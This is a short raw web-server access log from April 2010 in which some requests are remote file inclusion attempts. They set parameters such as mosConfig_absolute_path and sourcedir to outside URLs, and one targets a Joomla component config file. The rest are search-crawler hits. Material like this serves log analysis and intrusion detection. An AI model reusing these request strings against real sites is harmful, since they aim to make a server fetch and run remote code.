121.78.118.123 - - [20/Apr/2010:16:54:18 -0500] "GET /logs/access_log.1219363200%20%20//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.nationalmedecine.com/forum/autoid.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:16:56:05 -0500] "GET /logs/access_log.1154822400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
78.46.42.233 - - [20/Apr/2010:16:57:07 -0500] "GET /logs/access_log.1263859200/?sourcedir=http://www.f1h2o.com/.logs?? HTTP/1.1" 404 311 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
78.46.42.233 - - [20/Apr/2010:16:57:07 -0500] "GET /?sourcedir=http://www.f1h2o.com/.logs?? HTTP/1.1" 200 1003 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
78.46.42.233 - - [20/Apr/2010:16:57:07 -0500] "GET /logs/?sourcedir=http://www.f1h2o.com/.logs?? HTTP/1.1" 200 2456 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
87.250.255.243 - - [20/Apr/2010:16:57:21 -0500] "GET /logs/access_log.1185494400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
78.46.42.233 - - [20/Apr/2010:16:57:55 -0500] "GET /logs/access_log.1223856000/?sourcedir=http://fuerzarh.com//appserv/.logs? HTTP/1.1" 404 311